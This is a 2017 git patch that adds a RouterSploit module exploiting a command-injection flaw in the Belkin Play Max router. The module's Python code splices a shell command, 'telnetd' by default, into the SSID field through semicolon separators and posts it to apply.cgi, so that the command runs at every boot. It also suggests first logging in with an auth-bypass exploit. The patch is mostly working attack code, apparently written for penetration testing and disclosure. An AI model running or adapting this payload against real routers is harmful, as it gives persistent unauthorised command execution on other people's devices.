From b9c3b2363da817ad120fd40c7f4e0d5f65f51f64 Mon Sep 17 00:00:00 2001
From: BigNerd95 <lorenzo.santina@edu.unito.it>
Date: Mon, 20 Feb 2017 19:48:10 +0100
Subject: [PATCH] Added Belkin Exploit

Persistent Remote Command Execution on Belkin Play Max (0day)
---
 .gitignore                                    |  4 +
 .../modules/exploits/belkin/play_max_prce.py  | 75 +++++++++++++++++++
 2 files changed, 79 insertions(+)
 create mode 100644 routersploit/modules/exploits/belkin/play_max_prce.py

diff --git a/.gitignore b/.gitignore
index 0b5079e04..358d51529 100644
--- a/.gitignore
+++ b/.gitignore
@@ -67,3 +67,7 @@ target/
 
 # virtualenv
 venv/
+
+# macOS
+.DS_Store
+.DS_Store?
diff --git a/routersploit/modules/exploits/belkin/play_max_prce.py b/routersploit/modules/exploits/belkin/play_max_prce.py
new file mode 100644
index 000000000..5b959aaf6
--- /dev/null
+++ b/routersploit/modules/exploits/belkin/play_max_prce.py
@@ -0,0 +1,75 @@
+import re
+
+from routersploit import (
+    exploits,
+    print_error,
+    print_success,
+    http_request,
+    mute,
+    validators,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Persistent remote command execution.
+    If the target is vulnerable, you can run a bash command at every boot.
+    You must be logged in to run this exploit, you can use auth_bypass exploit to log in.
+    """
+    __info__ = {
+        'name': 'Belkin Persistent Remote Command Execution',
+        'description': 'Module exploits Belkin SSID injection vuln, allowing to execute arbitrary command at every boot',
+        'authors': [
+            'BigNerd95 (Lorenzo Santina)',  # vulnerability discovery and routersploit module
+        ],
+        'references': [
+            'https://bignerd95.blogspot.it/2017/02/belkin-play-max-persistent-remote.html',
+            'https://gist.github.com/BigNerd95/c18658b472ac0ccf4dbbc73fe988b683'
+        ],
+        'devices': [
+            'Belkin Play Max (F7D4401)',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
+    port = exploits.Option(80, 'Target Port')
+    cmd = exploits.Option('telnetd', 'Command to execute')
+
+    def run(self):
+
+        ssid_url = "{}:{}/wireless_id.stm".format(self.target, self.port)
+        response = http_request(method="GET", url=ssid_url)
+        if response is None:
+            return
+
+        srcSSID = re.search("document\.tF\['ssid'\]\.value=\"(.*)\";", response.text)
+        if srcSSID:
+            SSID = srcSSID.group(1)
+        else:
+            print_error("Exploit failed. Are you logged in?")
+            exit(1)
+
+        if len(SSID)+2+len(self.cmd) > 32:
+            newlen = 32 - len(self.cmd) - 2
+            SSID = SSID[0:newlen]
+            print_status("SSID too long, it will be truncated to: "+SSID)
+
+        newSSID = SSID+"%3B"+self.cmd+"%3B"
+
+        payload = "page=radio.asp&location_page=wireless_id.stm&wl_bssid=&wl_unit=0&wl_action=1&wl_ssid="+newSSID+"&arc_action=Apply+Changes&wchan=1&ssid="+newSSID
+        url = "{}:{}/apply.cgi".format(self.target, self.port)
+        response = http_request(method="POST", url=url, data=payload)
+
+        if response is None:
+            return
+
+        err = re.search('countdown\(55\);', response.text)
+        if err:
+            print_success("Exploit success, wait until router reboot.")
+        else:
+            print_error("Exploit failed. Device seems to be not vulnerable.")
+            exit(1)
+
+    @mute
+    def check(self):
+        return None